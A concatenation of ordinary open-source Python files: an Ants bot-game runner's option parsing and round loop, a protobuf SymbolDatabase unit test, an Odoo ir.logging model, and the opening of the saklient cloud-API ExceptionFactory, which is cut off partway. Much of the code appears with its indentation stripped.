help="Number of turns cutoff percentage is maintained to end game early")
game_group.add_option("--cutoff_percent", dest="cutoff_percent", type="float", default=0.85,
help="Number of turns cutoff percentage is maintained to end game early")
game_group.add_option("--scenario", dest="scenario",
action='store_true', default=False)
parser.add_option_group(game_group)
# the log directory must be specified for any logging to occur, except:
# bot errors to stderr
# verbose levels 1 & 2 to stdout and stderr
# profiling to stderr
# the log directory will contain
# the replay or stream file used by the visualizer, if requested
# the bot input/output/error logs, if requested
log_group = OptionGroup(parser, "Logging Options", "Options that control the logging")
log_group.add_option("-g", "--game", dest="game_id", default=0, type='int',
help="game id to start at when numbering log files")
log_group.add_option("-l", "--log_dir", dest="log_dir", default=None,
help="Directory to dump replay files to.")
    log_group.add_option('-R', '--log_replay', dest='log_replay',
                         action='store_true', default=False,
                         help='Log the replay file used by the visualizer')
    log_group.add_option('-S', '--log_stream', dest='log_stream',
                         action='store_true', default=False,
                         help='Log the stream file used by the visualizer')
log_group.add_option("-I", "--log_input", dest="log_input",
action="store_true", default=False,
help="Log input streams sent to bots")
log_group.add_option("-O", "--log_output", dest="log_output",
action="store_true", default=False,
help="Log output streams from bots")
log_group.add_option("-E", "--log_error", dest="log_error",
action="store_true", default=False,
help="log error streams from bots")
log_group.add_option('-e', '--log_stderr', dest='log_stderr',
action='store_true', default=False,
help='additionally log bot errors to stderr')
log_group.add_option('-o', '--log_stdout', dest='log_stdout',
action='store_true', default=False,
help='additionally log replay/stream to stdout')
# verbose will not print bot input/output/errors
# only info+debug will print bot error output
log_group.add_option("-v", "--verbose", dest="verbose",
action='store_true', default=False,
help="Print out status as game goes.")
log_group.add_option("--profile", dest="profile",
action="store_true", default=False,
help="Run under the python profiler")
parser.add_option("--nolaunch", dest="nolaunch",
action='store_true', default=False,
help="Prevent visualizer from launching")
log_group.add_option("--html", dest="html_file",
default=None,
help="Output file name for an html replay")
parser.add_option_group(log_group)
(opts, args) = parser.parse_args(argv)
if opts.map is None or not os.path.exists(opts.map):
parser.print_help()
return -1
try:
if opts.profile:
# put profile file into output dir if we can
prof_file = "ants.profile"
if opts.log_dir:
prof_file = os.path.join(opts.log_dir, prof_file)
# cProfile needs to be explitly told about out local and global context
print("Running profile and outputting to {0}".format(prof_file,), file=stderr)
cProfile.runctx("run_rounds(opts,args)", globals(), locals(), prof_file)
else:
# only use psyco if we are not profiling
# (psyco messes with profiling)
try:
import psyco
psyco.full()
except ImportError:
pass
run_rounds(opts,args)
return 0
except Exception:
traceback.print_exc()
return -1
def run_rounds(opts,args):
def get_cmd_wd(cmd, exec_rel_cwd=False):
''' get the proper working directory from a command line '''
new_cmd = []
wd = None
for i, part in reversed(list(enumerate(cmd.split()))):
            if wd is None and os.path.exists(part):
wd = os.path.dirname(os.path.realpath(part))
basename = os.path.basename(part)
if i == 0:
if exec_rel_cwd:
new_cmd.insert(0, os.path.join(".", basename))
else:
new_cmd.insert(0, part)
else:
new_cmd.insert(0, basename)
else:
new_cmd.insert(0, part)
return wd, ' '.join(new_cmd)
def get_cmd_name(cmd):
''' get the name of a bot from the command line '''
for i, part in enumerate(reversed(cmd.split())):
if os.path.exists(part):
return os.path.basename(part)
# this split of options is not needed, but left for documentation
game_options = {
"map": opts.map,
"attack": opts.attack,
"kill_points": opts.kill_points,
"food": opts.food,
"viewradius2": opts.viewradius2,
"attackradius2": opts.attackradius2,
"spawnradius2": opts.spawnradius2,
"loadtime": opts.loadtime,
"turntime": opts.turntime,
"turns": opts.turns,
"food_rate": opts.food_rate,
"food_turn": opts.food_turn,
"food_start": opts.food_start,
"food_visible": opts.food_visible,
"carry_food": opts.carry_food,
"cutoff_turn": opts.cutoff_turn,
"cutoff_percent": opts.cutoff_percent,
"scenario": opts.scenario }
    if opts.player_seed is not None:
        game_options['player_seed'] = opts.player_seed
    if opts.engine_seed is not None:
        game_options['engine_seed'] = opts.engine_seed
engine_options = {
"loadtime": opts.loadtime,
"turntime": opts.turntime,
"map_file": opts.map,
"turns": opts.turns,
"log_replay": opts.log_replay,
"log_stream": opts.log_stream,
"log_input": opts.log_input,
"log_output": opts.log_output,
"log_error": opts.log_error,
"serial": opts.serial,
"strict": opts.strict,
"capture_errors": opts.capture_errors,
"secure_jail": opts.secure_jail,
"end_wait": opts.end_wait }
for round in range(opts.rounds):
# initialize game
game_id = round + opts.game_id
with open(opts.map, 'r') as map_file:
game_options['map'] = map_file.read()
if opts.engine_seed:
game_options['engine_seed'] = opts.engine_seed + round
game = Ants(game_options)
# initialize bots
bots = [get_cmd_wd(arg, exec_rel_cwd=opts.secure_jail) for arg in args]
bot_count = len(bots)
# insure correct number of bots, or fill in remaining positions
if game.num_players != len(bots):
if game.num_players > len(bots) and opts.fill:
extra = game.num_players - len(bots)
for _ in range(extra):
bots.append(bots[-1])
else:
print("Incorrect number of bots for map. Need {0}, got {1}"
.format(game.num_players, len(bots)), file=stderr)
for arg in args:
print("Bot Cmd: {0}".format(arg), file=stderr)
break
bot_count = len(bots)
# move position of first bot specified
if opts.position > 0 and opts.position <= len(bots):
first_bot = bots[0]
bots = bots[1:]
bots.insert(opts.position, first_bot)
# initialize file descriptors
if opts.log_dir and not os.path.exists(opts.log_dir):
os.mkdir(opts.log_dir)
if not opts.log_replay and not opts.log_stream and (opts.log_dir or opts.log_stdout):
opts.log_replay = True
replay_path = None # used for visualizer launch
if opts.log_replay:
if opts.log_dir:
replay_path = os.path.join(opts.log_dir, '{0}.replay'.format(game_id))
engine_options['replay_log'] = open(replay_path, 'w')
if opts.log_stdout:
if 'replay_log' in engine_options and engine_options['replay_log']:
engine_options['replay_log'] = Tee(sys.stdout, engine_options['replay_log'])
else:
engine_options['replay_log'] = sys.stdout
else:
engine_options['replay_log'] = None
if opts.log_stream:
if opts.log_dir:
engine_options['stream_log'] = open(os.path.join(opts.log_dir, '{0}.stream'.format(game_id)), 'w')
if opts.log_stdout:
if engine_options['stream_log']:
engine_options['stream_log'] = Tee(sys.stdout, engine_options['stream_log'])
else:
engine_options['stream_log'] = sys.stdout
else:
engine_options['stream_log'] = None
if opts.log_input and opts.log_dir:
engine_options['input_logs'] = [open(os.path.join(opts.log_dir, '{0}.bot{1}.input'.format(game_id, i)), 'w')
for i in range(bot_count)]
else:
engine_options['input_logs'] = None
if opts.log_output and opts.log_dir:
engine_options['output_logs'] = [open(os.path.join(opts.log_dir, '{0}.bot{1}.output'.format(game_id, i)), 'w')
for i in range(bot_count)]
else:
engine_options['output_logs'] = None
if opts.log_error and opts.log_dir:
if opts.log_stderr:
if opts.log_stdout:
engine_options['error_logs'] = [Tee(Comment(stderr), open(os.path.join(opts.log_dir, '{0}.bot{1}.error'.format(game_id, i)), 'w'))
for i in range(bot_count)]
else:
engine_options['error_logs'] = [Tee(stderr, open(os.path.join(opts.log_dir, '{0}.bot{1}.error'.format(game_id, i)), 'w'))
for i in range(bot_count)]
else:
engine_options['error_logs'] = [open(os.path.join(opts.log_dir, '{0}.bot{1}.error'.format(game_id, i)), 'w')
for i in range(bot_count)]
elif opts.log_stderr:
if opts.log_stdout:
engine_options['error_logs'] = [Comment(stderr)] * bot_count
else:
engine_options['error_logs'] = [stderr] * bot_count
else:
engine_options['error_logs'] = None
if opts.verbose:
if opts.log_stdout:
engine_options['verbose_log'] = Comment(sys.stdout)
else:
engine_options['verbose_log'] = sys.stdout
engine_options['game_id'] = game_id
if opts.rounds > 1:
print('# playgame round {0}, game id {1}'.format(round, game_id))
# intercept replay log so we can add player names
if opts.log_replay:
intcpt_replay_io = StringIO()
real_replay_io = engine_options['replay_log']
engine_options['replay_log'] = intcpt_replay_io
result = run_game(game, bots, engine_options)
# add player names, write to proper io, reset back to normal
if opts.log_replay:
replay_json = json.loads(intcpt_replay_io.getvalue())
replay_json['playernames'] = [get_cmd_name(arg) for arg in args]
real_replay_io.write(json.dumps(replay_json))
intcpt_replay_io.close()
engine_options['replay_log'] = real_replay_io
# close file descriptors
if engine_options['stream_log']:
engine_options['stream_log'].close()
if engine_options['replay_log']:
engine_options['replay_log'].close()
if engine_options['input_logs']:
for input_log in engine_options['input_logs']:
input_log.close()
if engine_options['output_logs']:
for output_log in engine_options['output_logs']:
output_log.close()
if engine_options['error_logs']:
for error_log in engine_options['error_logs']:
error_log.close()
if replay_path:
if opts.nolaunch:
if opts.html_file:
visualizer.visualize_locally.launch(replay_path, True, opts.html_file)
else:
                if opts.html_file is None:
visualizer.visualize_locally.launch(replay_path,
generated_path="replay.{0}.html".format(game_id))
else:
visualizer.visualize_locally.launch(replay_path,
generated_path=opts.html_file)
if __name__ == "__main__":
sys.exit(main(sys.argv[1:]))
| gpl-2.0 | 5,618,681,464,800,026,000 | 43.652268 | 150 | 0.549918 | false |
jjas0nn/solvem | tensorflow/lib/python2.7/site-packages/google/protobuf/internal/symbol_database_test.py | 43 | 5386 | #! /usr/bin/env python
#
# Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# https://developers.google.com/protocol-buffers/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests for google.protobuf.symbol_database."""
try:
import unittest2 as unittest #PY26
except ImportError:
import unittest
from google.protobuf import unittest_pb2
from google.protobuf import descriptor
from google.protobuf import descriptor_pool
from google.protobuf import symbol_database
class SymbolDatabaseTest(unittest.TestCase):
def _Database(self):
if descriptor._USE_C_DESCRIPTORS:
# The C++ implementation does not allow mixing descriptors from
# different pools.
db = symbol_database.SymbolDatabase(pool=descriptor_pool.Default())
else:
db = symbol_database.SymbolDatabase()
# Register representative types from unittest_pb2.
db.RegisterFileDescriptor(unittest_pb2.DESCRIPTOR)
db.RegisterMessage(unittest_pb2.TestAllTypes)
db.RegisterMessage(unittest_pb2.TestAllTypes.NestedMessage)
db.RegisterMessage(unittest_pb2.TestAllTypes.OptionalGroup)
db.RegisterMessage(unittest_pb2.TestAllTypes.RepeatedGroup)
db.RegisterEnumDescriptor(unittest_pb2.ForeignEnum.DESCRIPTOR)
db.RegisterEnumDescriptor(unittest_pb2.TestAllTypes.NestedEnum.DESCRIPTOR)
return db
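  # This mirrors what generated *_pb2 modules do at import time: register the
  # file descriptor plus each message and enum so that later lookups by
  # fully-qualified name (e.g. 'protobuf_unittest.TestAllTypes') succeed.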
def testGetPrototype(self):
instance = self._Database().GetPrototype(
unittest_pb2.TestAllTypes.DESCRIPTOR)
self.assertTrue(instance is unittest_pb2.TestAllTypes)
def testGetMessages(self):
messages = self._Database().GetMessages(
['google/protobuf/unittest.proto'])
self.assertTrue(
unittest_pb2.TestAllTypes is
messages['protobuf_unittest.TestAllTypes'])
def testGetSymbol(self):
self.assertEqual(
unittest_pb2.TestAllTypes, self._Database().GetSymbol(
'protobuf_unittest.TestAllTypes'))
self.assertEqual(
unittest_pb2.TestAllTypes.NestedMessage, self._Database().GetSymbol(
'protobuf_unittest.TestAllTypes.NestedMessage'))
self.assertEqual(
unittest_pb2.TestAllTypes.OptionalGroup, self._Database().GetSymbol(
'protobuf_unittest.TestAllTypes.OptionalGroup'))
self.assertEqual(
unittest_pb2.TestAllTypes.RepeatedGroup, self._Database().GetSymbol(
'protobuf_unittest.TestAllTypes.RepeatedGroup'))
def testEnums(self):
# Check registration of types in the pool.
self.assertEqual(
'protobuf_unittest.ForeignEnum',
self._Database().pool.FindEnumTypeByName(
'protobuf_unittest.ForeignEnum').full_name)
self.assertEqual(
'protobuf_unittest.TestAllTypes.NestedEnum',
self._Database().pool.FindEnumTypeByName(
'protobuf_unittest.TestAllTypes.NestedEnum').full_name)
def testFindMessageTypeByName(self):
self.assertEqual(
'protobuf_unittest.TestAllTypes',
self._Database().pool.FindMessageTypeByName(
'protobuf_unittest.TestAllTypes').full_name)
self.assertEqual(
'protobuf_unittest.TestAllTypes.NestedMessage',
self._Database().pool.FindMessageTypeByName(
'protobuf_unittest.TestAllTypes.NestedMessage').full_name)
def testFindFindContainingSymbol(self):
# Lookup based on either enum or message.
self.assertEqual(
'google/protobuf/unittest.proto',
self._Database().pool.FindFileContainingSymbol(
'protobuf_unittest.TestAllTypes.NestedEnum').name)
self.assertEqual(
'google/protobuf/unittest.proto',
self._Database().pool.FindFileContainingSymbol(
'protobuf_unittest.TestAllTypes').name)
def testFindFileByName(self):
self.assertEqual(
'google/protobuf/unittest.proto',
self._Database().pool.FindFileByName(
'google/protobuf/unittest.proto').name)
if __name__ == '__main__':
unittest.main()
| mit | 4,791,155,438,559,791,000 | 40.114504 | 78 | 0.735797 | false |
Nowheresly/odoo | openerp/addons/base/ir/ir_logging.py | 326 | 1882 | ##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2014 OpenERP SA (<http://www.openerp.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import logging
from openerp.osv import osv, fields
from openerp.tools.translate import _
class ir_logging(osv.Model):
_name = 'ir.logging'
_order = 'id DESC'
EXCEPTIONS_TYPE = [
('client', 'Client'),
('server', 'Server')
]
_columns = {
'create_date': fields.datetime('Create Date', readonly=True),
        'create_uid': fields.integer('Uid', readonly=True),  # Integer not m2o is intentional
'name': fields.char('Name', required=True),
'type': fields.selection(EXCEPTIONS_TYPE, string='Type', required=True, select=True),
'dbname': fields.char('Database Name', select=True),
'level': fields.char('Level', select=True),
'message': fields.text('Message', required=True),
'path': fields.char('Path', required=True),
'func': fields.char('Function', required=True),
'line': fields.char('Line', required=True),
}
| agpl-3.0 | 4,807,216,048,465,163,000 | 39.913043 | 94 | 0.608927 | false |
sakura-internet/saklient.python | saklient/errors/exceptionfactory.py | 1 | 32200 | # -*- coding:utf-8 -*-
# This code is automatically transpiled by Saklient Translator
import six
from .httpexception import HttpException
from .httpbadgatewayexception import HttpBadGatewayException
from .httpbadrequestexception import HttpBadRequestException
from .httpconflictexception import HttpConflictException
from .httpexpectationfailedexception import HttpExpectationFailedException
from .httpfaileddependencyexception import HttpFailedDependencyException
from .httpforbiddenexception import HttpForbiddenException
from .httpgatewaytimeoutexception import HttpGatewayTimeoutException
from .httpgoneexception import HttpGoneException
from .httphttpversionnotsupportedexception import HttpHttpVersionNotSupportedException
from .httpinsufficientstorageexception import HttpInsufficientStorageException
from .httpinternalservererrorexception import HttpInternalServerErrorException
from .httplengthrequiredexception import HttpLengthRequiredException
from .httplockedexception import HttpLockedException
from .httpmethodnotallowedexception import HttpMethodNotAllowedException
from .httpnotacceptableexception import HttpNotAcceptableException
from .httpnotextendedexception import HttpNotExtendedException
from .httpnotfoundexception import HttpNotFoundException
from .httpnotimplementedexception import HttpNotImplementedException
from .httppaymentrequiredexception import HttpPaymentRequiredException
from .httppreconditionfailedexception import HttpPreconditionFailedException
from .httpproxyauthenticationrequiredexception import HttpProxyAuthenticationRequiredException
from .httprequestentitytoolargeexception import HttpRequestEntityTooLargeException
from .httprequesttimeoutexception import HttpRequestTimeoutException
from .httprequesturitoolongexception import HttpRequestUriTooLongException
from .httprequestedrangenotsatisfiableexception import HttpRequestedRangeNotSatisfiableException
from .httpserviceunavailableexception import HttpServiceUnavailableException
from .httpunauthorizedexception import HttpUnauthorizedException
from .httpunprocessableentityexception import HttpUnprocessableEntityException
from .httpunsupportedmediatypeexception import HttpUnsupportedMediaTypeException
from .httpupgraderequiredexception import HttpUpgradeRequiredException
from .httpvariantalsonegotiatesexception import HttpVariantAlsoNegotiatesException
from ..cloud.errors.accessapikeydisabledexception import AccessApiKeyDisabledException
from ..cloud.errors.accesssakuraexception import AccessSakuraException
from ..cloud.errors.accessstaffexception import AccessStaffException
from ..cloud.errors.accesstokenexception import AccessTokenException
from ..cloud.errors.accessxhrorapikeyexception import AccessXhrOrApiKeyException
from ..cloud.errors.accountnotfoundexception import AccountNotFoundException
from ..cloud.errors.accountnotspecifiedexception import AccountNotSpecifiedException
from ..cloud.errors.ambiguousidentifierexception import AmbiguousIdentifierException
from ..cloud.errors.ambiguouszoneexception import AmbiguousZoneException
from ..cloud.errors.apiproxytimeoutexception import ApiProxyTimeoutException
from ..cloud.errors.apiproxytimeoutnongetexception import ApiProxyTimeoutNonGetException
from ..cloud.errors.archiveisincompleteexception import ArchiveIsIncompleteException
from ..cloud.errors.bootfailurebylockexception import BootFailureByLockException
from ..cloud.errors.bootfailureingroupexception import BootFailureInGroupException
from ..cloud.errors.busyexception import BusyException
from ..cloud.errors.cantresizesmallerexception import CantResizeSmallerException
from ..cloud.errors.cdromdevicelockedexception import CdromDeviceLockedException
from ..cloud.errors.cdromdisabledexception import CdromDisabledException
from ..cloud.errors.cdrominuseexception import CdromInUseException
from ..cloud.errors.cdromisincompleteexception import CdromIsIncompleteException
from ..cloud.errors.connecttosameswitchexception import ConnectToSameSwitchException
from ..cloud.errors.contractcreationexception import ContractCreationException
from ..cloud.errors.copytoitselfexception import CopyToItselfException
from ..cloud.errors.deletediskb4templateexception import DeleteDiskB4TemplateException
from ..cloud.errors.deleteipv6netsfirstexception import DeleteIpV6NetsFirstException
from ..cloud.errors.deleteresb4accountexception import DeleteResB4AccountException
from ..cloud.errors.deleterouterb4switchexception import DeleteRouterB4SwitchException
from ..cloud.errors.deletestaticroutefirstexception import DeleteStaticRouteFirstException
from ..cloud.errors.disabledinsandboxexception import DisabledInSandboxException
from ..cloud.errors.disconnectb4deleteexception import DisconnectB4DeleteException
from ..cloud.errors.disconnectb4updateexception import DisconnectB4UpdateException
from ..cloud.errors.diskconnectionlimitexception import DiskConnectionLimitException
from ..cloud.errors.diskiscopyingexception import DiskIsCopyingException
from ..cloud.errors.diskisnotavailableexception import DiskIsNotAvailableException
from ..cloud.errors.disklicensemismatchexception import DiskLicenseMismatchException
from ..cloud.errors.diskorssinmigrationexception import DiskOrSsInMigrationException
from ..cloud.errors.diskstockrunoutexception import DiskStockRunOutException
from ..cloud.errors.dnsarecordnotfoundexception import DnsARecordNotFoundException
from ..cloud.errors.dnsaaaarecordnotfoundexception import DnsAaaaRecordNotFoundException
from ..cloud.errors.dnsptrupdatefailureexception import DnsPtrUpdateFailureException
from ..cloud.errors.dontcreateinsandboxexception import DontCreateInSandboxException
from ..cloud.errors.duplicateaccountcodeexception import DuplicateAccountCodeException
from ..cloud.errors.duplicateentryexception import DuplicateEntryException
from ..cloud.errors.duplicateusercodeexception import DuplicateUserCodeException
from ..cloud.errors.filenotuploadedexception import FileNotUploadedException
from ..cloud.errors.filterarraycomparisonexception import FilterArrayComparisonException
from ..cloud.errors.filterbadoperatorexception import FilterBadOperatorException
from ..cloud.errors.filternullcomparisonexception import FilterNullComparisonException
from ..cloud.errors.filterunknownoperatorexception import FilterUnknownOperatorException
from ..cloud.errors.ftpcannotcloseexception import FtpCannotCloseException
from ..cloud.errors.ftpisalreadycloseexception import FtpIsAlreadyCloseException
from ..cloud.errors.ftpisalreadyopenexception import FtpIsAlreadyOpenException
from ..cloud.errors.ftpmustbeclosedexception import FtpMustBeClosedException
from ..cloud.errors.hostoperationfailureexception import HostOperationFailureException
from ..cloud.errors.illegaldasusageexception import IllegalDasUsageException
from ..cloud.errors.inmigrationexception import InMigrationException
from ..cloud.errors.invalidformatexception import InvalidFormatException
from ..cloud.errors.invalidparamcombexception import InvalidParamCombException
from ..cloud.errors.invalidrangeexception import InvalidRangeException
from ..cloud.errors.invaliduriargumentexception import InvalidUriArgumentException
from ..cloud.errors.ipv6netalreadyattachedexception import IpV6NetAlreadyAttachedException
from ..cloud.errors.limitcountinaccountexception import LimitCountInAccountException
from ..cloud.errors.limitcountinmemberexception import LimitCountInMemberException
from ..cloud.errors.limitcountinnetworkexception import LimitCountInNetworkException
from ..cloud.errors.limitcountinrouterexception import LimitCountInRouterException
from ..cloud.errors.limitcountinzoneexception import LimitCountInZoneException
from ..cloud.errors.limitmemoryinaccountexception import LimitMemoryInAccountException
from ..cloud.errors.limitsizeinaccountexception import LimitSizeInAccountException
from ..cloud.errors.missingisoimageexception import MissingIsoImageException
from ..cloud.errors.missingparamexception import MissingParamException
from ..cloud.errors.mustbeofsamezoneexception import MustBeOfSameZoneException
from ..cloud.errors.nodisplayresponseexception import NoDisplayResponseException
from ..cloud.errors.notforrouterexception import NotForRouterException
from ..cloud.errors.notreplicatingexception import NotReplicatingException
from ..cloud.errors.notwithhybridconnexception import NotWithHybridconnException
from ..cloud.errors.oldstorageplanexception import OldStoragePlanException
from ..cloud.errors.operationfailureexception import OperationFailureException
from ..cloud.errors.operationtimeoutexception import OperationTimeoutException
from ..cloud.errors.originalhashmismatchexception import OriginalHashMismatchException
from ..cloud.errors.packetfilterapplyingexception import PacketFilterApplyingException
from ..cloud.errors.packetfilterversionmismatchexception import PacketFilterVersionMismatchException
from ..cloud.errors.paramipnotfoundexception import ParamIpNotFoundException
from ..cloud.errors.paramresnotfoundexception import ParamResNotFoundException
from ..cloud.errors.paymentcreditcardexception import PaymentCreditCardException
from ..cloud.errors.paymentpaymentexception import PaymentPaymentException
from ..cloud.errors.paymentregistrationexception import PaymentRegistrationException
from ..cloud.errors.paymenttelcertificationexception import PaymentTelCertificationException
from ..cloud.errors.paymentunpayableexception import PaymentUnpayableException
from ..cloud.errors.penaltyoperationexception import PenaltyOperationException
from ..cloud.errors.replicaalreadyexistsexception import ReplicaAlreadyExistsException
from ..cloud.errors.replicanotfoundexception import ReplicaNotFoundException
from ..cloud.errors.resalreadyconnectedexception import ResAlreadyConnectedException
from ..cloud.errors.resalreadydisconnectedexception import ResAlreadyDisconnectedException
from ..cloud.errors.resalreadyexistsexception import ResAlreadyExistsException
from ..cloud.errors.resusedinzoneexception import ResUsedInZoneException
from ..cloud.errors.resourcepathnotfoundexception import ResourcePathNotFoundException
from ..cloud.errors.runoutofipaddressexception import RunOutOfIpAddressException
from ..cloud.errors.samelicenserequiredexception import SameLicenseRequiredException
from ..cloud.errors.servercouldnotstopexception import ServerCouldNotStopException
from ..cloud.errors.serveriscleaningexception import ServerIsCleaningException
from ..cloud.errors.serveroperationfailureexception import ServerOperationFailureException
from ..cloud.errors.serverpowermustbedownexception import ServerPowerMustBeDownException
from ..cloud.errors.serverpowermustbeupexception import ServerPowerMustBeUpException
from ..cloud.errors.servicetemporarilyunavailableexception import ServiceTemporarilyUnavailableException
from ..cloud.errors.sizemismatchexception import SizeMismatchException
from ..cloud.errors.snapshotinmigrationexception import SnapshotInMigrationException
from ..cloud.errors.stillcreatingexception import StillCreatingException
from ..cloud.errors.storageabnormalexception import StorageAbnormalException
from ..cloud.errors.storageoperationfailureexception import StorageOperationFailureException
from ..cloud.errors.switchhybridconnectedexception import SwitchHybridConnectedException
from ..cloud.errors.templateftpisopenexception import TemplateFtpIsOpenException
from ..cloud.errors.templateisincompleteexception import TemplateIsIncompleteException
from ..cloud.errors.toomanyrequestexception import TooManyRequestException
from ..cloud.errors.unknownexception import UnknownException
from ..cloud.errors.unknownostypeexception import UnknownOsTypeException
from ..cloud.errors.unsupportedresclassexception import UnsupportedResClassException
from ..cloud.errors.usernotspecifiedexception import UserNotSpecifiedException
from ..cloud.errors.vncproxyrequestfailureexception import VncProxyRequestFailureException
from ..util import Util
import saklient
str = six.text_type
# module saklient.errors.exceptionfactory
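# ExceptionFactory.create() maps the error-code string returned by the Sakura
# Cloud API to the matching saklient exception class; codes it does not
# recognize fall through to a generic HTTP exception further down the chain.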
class ExceptionFactory(object):
## @static
# @param {int} status
# @param {str} code=None
# @param {str} message=""
# @return {saklient.errors.httpexception.HttpException}
@staticmethod
def create(status, code=None, message=""):
if code == "access_apikey_disabled":
return AccessApiKeyDisabledException(status, code, message)
elif code == "access_sakura":
return AccessSakuraException(status, code, message)
elif code == "access_staff":
return AccessStaffException(status, code, message)
elif code == "access_token":
return AccessTokenException(status, code, message)
elif code == "access_xhr_or_apikey":
return AccessXhrOrApiKeyException(status, code, message)
elif code == "account_not_found":
return AccountNotFoundException(status, code, message)
elif code == "account_not_specified":
return AccountNotSpecifiedException(status, code, message)
elif code == "ambiguous_identifier":
return AmbiguousIdentifierException(status, code, message)
elif code == "ambiguous_zone":
return AmbiguousZoneException(status, code, message)
elif code == "apiproxy_timeout":
return ApiProxyTimeoutException(status, code, message)
elif code == "apiproxy_timeout_non_get":
return ApiProxyTimeoutNonGetException(status, code, message)
elif code == "archive_is_incomplete":
return ArchiveIsIncompleteException(status, code, message)
elif code == "bad_gateway":
return HttpBadGatewayException(status, code, message)
elif code == "bad_request":
return HttpBadRequestException(status, code, message)
elif code == "boot_failure_by_lock":
return BootFailureByLockException(status, code, message)
elif code == "boot_failure_in_group":
return BootFailureInGroupException(status, code, message)
elif code == "busy":
return BusyException(status, code, message)
elif code == "cant_resize_smaller":
return CantResizeSmallerException(status, code, message)
elif code == "cdrom_device_locked":
return CdromDeviceLockedException(status, code, message)
elif code == "cdrom_disabled":
return CdromDisabledException(status, code, message)
elif code == "cdrom_in_use":
return CdromInUseException(status, code, message)
elif code == "cdrom_is_incomplete":
return CdromIsIncompleteException(status, code, message)
elif code == "conflict":
return HttpConflictException(status, code, message)
elif code == "connect_to_same_switch":
return ConnectToSameSwitchException(status, code, message)
elif code == "contract_creation":
return ContractCreationException(status, code, message)
elif code == "copy_to_itself":
return CopyToItselfException(status, code, message)
elif code == "delete_disk_b4_template":
return DeleteDiskB4TemplateException(status, code, message)
elif code == "delete_ipv6nets_first":
return DeleteIpV6NetsFirstException(status, code, message)
elif code == "delete_res_b4_account":
return DeleteResB4AccountException(status, code, message)
elif code == "delete_router_b4_switch":
return DeleteRouterB4SwitchException(status, code, message)
elif code == "delete_static_route_first":
return DeleteStaticRouteFirstException(status, code, message)
elif code == "disabled_in_sandbox":
return DisabledInSandboxException(status, code, message)
elif code == "disconnect_b4_delete":
return DisconnectB4DeleteException(status, code, message)
elif code == "disconnect_b4_update":
return DisconnectB4UpdateException(status, code, message)
elif code == "disk_connection_limit":
return DiskConnectionLimitException(status, code, message)
elif code == "disk_is_copying":
return DiskIsCopyingException(status, code, message)
elif code == "disk_is_not_available":
return DiskIsNotAvailableException(status, code, message)
elif code == "disk_license_mismatch":
return DiskLicenseMismatchException(status, code, message)
elif code == "disk_stock_run_out":
return DiskStockRunOutException(status, code, message)
elif code == "diskorss_in_migration":
return DiskOrSsInMigrationException(status, code, message)
elif code == "dns_a_record_not_found":
return DnsARecordNotFoundException(status, code, message)
elif code == "dns_aaaa_record_not_found":
return DnsAaaaRecordNotFoundException(status, code, message)
elif code == "dns_ptr_update_failure":
return DnsPtrUpdateFailureException(status, code, message)
elif code == "dont_create_in_sandbox":
return DontCreateInSandboxException(status, code, message)
elif code == "duplicate_account_code":
return DuplicateAccountCodeException(status, code, message)
elif code == "duplicate_entry":
return DuplicateEntryException(status, code, message)
elif code == "duplicate_user_code":
return DuplicateUserCodeException(status, code, message)
elif code == "expectation_failed":
return HttpExpectationFailedException(status, code, message)
elif code == "failed_dependency":
return HttpFailedDependencyException(status, code, message)
elif code == "file_not_uploaded":
return FileNotUploadedException(status, code, message)
elif code == "filter_array_comparison":
return FilterArrayComparisonException(status, code, message)
elif code == "filter_bad_operator":
return FilterBadOperatorException(status, code, message)
elif code == "filter_null_comparison":
return FilterNullComparisonException(status, code, message)
elif code == "filter_unknown_operator":
return FilterUnknownOperatorException(status, code, message)
elif code == "forbidden":
return HttpForbiddenException(status, code, message)
elif code == "ftp_cannot_close":
return FtpCannotCloseException(status, code, message)
elif code == "ftp_is_already_close":
return FtpIsAlreadyCloseException(status, code, message)
elif code == "ftp_is_already_open":
return FtpIsAlreadyOpenException(status, code, message)
elif code == "ftp_must_be_closed":
return FtpMustBeClosedException(status, code, message)
elif code == "gateway_timeout":
return HttpGatewayTimeoutException(status, code, message)
elif code == "gone":
return HttpGoneException(status, code, message)
elif code == "host_operation_failure":
return HostOperationFailureException(status, code, message)
elif code == "http_version_not_supported":
return HttpHttpVersionNotSupportedException(status, code, message)
elif code == "illegal_das_usage":
return IllegalDasUsageException(status, code, message)
elif code == "in_migration":
return InMigrationException(status, code, message)
elif code == "insufficient_storage":
return HttpInsufficientStorageException(status, code, message)
elif code == "internal_server_error":
